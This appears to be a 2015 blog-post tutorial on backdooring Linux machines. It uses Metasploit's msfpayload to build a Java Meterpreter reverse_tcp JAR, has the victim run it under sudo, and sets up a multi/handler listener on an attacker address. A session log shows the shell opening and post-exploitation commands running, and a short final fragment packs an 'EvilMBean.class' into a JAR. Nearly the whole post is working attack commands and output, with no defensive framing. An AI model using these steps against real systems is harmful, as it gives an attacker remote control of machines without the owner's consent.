Saturday, February 21, 2015

Compromising machines running Linux using Metasploit JAR Backdoors

We can compromise Windows machine using malicious EXE file acting as a backdoor generated using Metasploit. Machines running  Linux can be compromised using jar backdoors.

Creating jar backdoor file using Metasploit msfpayload to hack Linux box
root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************

Execute the jar file created above on Linux box
praveen@victim:/tmp$ sudo java -jar compromise.jar

On Kali Execute below commands so that victim will connect back to the attacker when victim executes JAR backdoor
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.1.1.32
LHOST => 1.1.1.32
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > exploit
msf exploit(handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (java/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  1.1.1.32         yes       The listen address
   LPORT  8888             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.32:8888
[*] Starting the payload handler...
[*] Sending stage (30355 bytes) to 1.1.1.40
[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500

Post exploitation commands
meterpreter > sysinfo
Computer    : victim
OS          : Linux 3.13.0-32-generic (amd64)
Meterpreter : java/java
meterpreter > pwd
/tmp

Creating jar file from class file.
root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class
added manifest
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)